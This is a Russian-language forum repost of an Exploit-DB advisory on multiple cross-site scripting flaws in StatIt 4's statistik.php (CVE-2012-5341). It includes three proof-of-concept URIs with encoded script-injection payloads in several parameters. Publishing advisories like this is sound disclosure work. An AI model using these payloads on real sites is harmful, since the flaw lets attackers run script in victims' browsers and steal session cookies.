Exploit StatIt 4 - 'statistik.php' Multiple Cross-Site Scripting Vulnerabilities

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
36499
Проверка EDB
  1. Пройдено
Автор
SONYY
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2012-5341
Дата публикации
2012-01-04
StatIt 4 - 'statistik.php' Multiple Cross-Site Scripting Vulnerabilities
Код: 
source: https://www.securityfocus.com/bid/51280/info

StatIt is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

StatIt 4 is vulnerable; other versions may be affected. 

The following example URIs are available:

http://www.example.com/statit4/statistik.php?st_id=1&action=stat_last%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E&enc=333263120212292&agent=ari/534.30&PHPSESSID=14d0f57363caf5ef2d7fb1b56238dace&PHPSESSID=14d0f57363caf5ef2d7fb1b56238dace

http://www.example.com/statit4/statistik.php?action=stat_tld&st_id=1&show=more%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E\&PHPSESSID=d8679fc904017bdf6b09f5d88f7cf979

http://www.example.com/statit4/statistik.php?action=stat_abfragen&st_id=1&show=more&order=2%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E&sort=1&PHPSESSID=698bf9d1e988e3af70022f1dfb86fd33
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit PHP Web Statistik 1.4 - Content Injection
Ответы
0
Просмотры
283
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Vaidya-Mitra 1.0 - Multiple SQLi
Ответы
0
Просмотры
612
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Online Thesis Archiving System v1.0 - Multiple-SQLi
Ответы
0
Просмотры
625
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Zenphoto 1.6 - Multiple stored XSS
Ответы
0
Просмотры
655
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Sales Tracker Management System v1.0 - Multiple Vulnerabilities
Ответы
0
Просмотры
583
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit WBCE CMS 1.6.1 - Multiple Stored Cross-Site Scripting (XSS)
Ответы
0
Просмотры
612
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Online Clinic Management System 2.2 - Multiple Stored Cross-Site Scripting (XSS)
Ответы
0
Просмотры
588
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Bang Resto v1.0 - 'Multiple' SQL Injection
Ответы
0
Просмотры
3K
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit SpotAuditor 5.3.5 - 'multiple' Denial Of Service (PoC)
Ответы
0
Просмотры
1K
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC)
Ответы
0
Просмотры
2K
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу